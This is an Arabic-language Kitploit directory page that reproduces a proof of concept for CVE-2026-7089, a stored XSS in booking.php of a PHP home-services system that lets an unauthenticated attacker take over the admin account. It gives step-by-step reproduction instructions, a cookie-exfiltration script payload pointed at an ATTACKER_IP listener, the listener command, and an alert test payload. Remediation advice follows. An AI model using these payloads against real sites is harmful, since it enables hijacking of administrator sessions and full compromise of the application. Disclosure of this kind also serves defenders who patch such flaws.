Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-7089-XSS — إثبات المفهوم لـ CVE-2026-7089، وهي ثغرة XSS مخزنة في نظام الخدمة المنزلية PHP 1.0 تسمح باختطاف جلسة المسؤول دون مصادقة عبر نموذج الحجز. | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-7089-xss
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

إثبات المفهوم لـ CVE-2026-7089، وهي ثغرة XSS مخزنة في نظام الخدمة المنزلية PHP 1.0 تسمح باختطاف جلسة المسؤول دون مصادقة عبر نموذج الحجز.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة استيلاء على حساب المسؤول عبر XSS مخزّن بدون مصادقة في نظام الخدمات المنزلية

تفاصيل الثغرة

الحقلالتفاصيل
البائعcode-projects.org
المنتجنظام الخدمات المنزلية بلغة PHP
الإصدار1.0
نوع الثغرةتخزين البرمجة النصية عبر المواقع (XSS)
CWECWE-79
المصادقة المطلوبةلا
المؤلفعماد علوي

الوصف

توجد ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في ملف booking.php من نظام الخدمات المنزلية بلغة PHP 1.0. يمكن للمستخدمين غير المصادق عليهم حقن حمولات JavaScript خبيثة من خلال حقول نموذج الحجز. يتم تخزين الإدخال غير المعقّم في قاعدة البيانات وعرضه دون ترميز المخرجات في لوحة الإدارة (admin.php)، حيث يتم تنفيذه في سياق متصفح المسؤول.

يسمح هذا لمهاجم غير مصادق بسرقة ملف تعريف ارتباط الجلسة الخاص بالمسؤول، وتنفيذ إجراءات نيابة عن المسؤول، أو اختراق حساب المسؤول بالكامل.


المكوّن المتأثر

  • الملف: booking.php
  • المعلمات: fname, lname
  • نقطة التنفيذ: admin.php ← إدارة الحجوزات

خطوات إعادة الإنتاج

  1. انتقل إلى صفحة الحجز كمستخدم غير مصادق: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. في حقل الاسم الأول، احقن الحمولة التالية:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. املأ الحقول المتبقية بأي بيانات صالحة وأرسل الحجز.

  2. شغّل مستمعًا على جهاز المهاجم:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. انتظر حتى يزور المسؤول قسم إدارة الحجوزات في admin.php.

  2. يتم تنفيذ الحمولة في متصفح المسؤول، مما يؤدي إلى تسريب ملف تعريف ارتباط الجلسة إلى المستمع الخاص بك.

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

إثبات المفهوم

الحمولة (تنبيه)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

الحمولة (اختطاف الجلسة)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

التأثير

تسمح هذه الثغرة لمهاجم عن بُعد غير مصادق باختراق التطبيق بالكامل.

يمكن للمهاجم:

  • تنفيذ JavaScript عشوائي في متصفح المسؤول
  • سرقة ملف تعريف ارتباط الجلسة PHPSESSID الخاص بالمسؤول
  • اختطاف جلسة المسؤول والحصول على وصول إداري كامل
  • تنفيذ أي إجراء إداري (إدارة الحجوزات، مقدمي الخدمات، إلخ)

يؤدي هذا إلى اختراق كامل للتطبيق.

الإصلاح

  • طبّق htmlspecialchars() مع ENT_QUOTES على جميع المدخلات المقدمة من المستخدم قبل التخزين أو العرض
  • نفّذ ترويسة سياسة أمان المحتوى (CSP)
  • تحقق من صحة جميع مدخلات النماذج وعقّمها على جانب الخادم

المراجع

  • نظام الخدمات المنزلية بلغة PHP - code-projects.org
تنزيل الأداة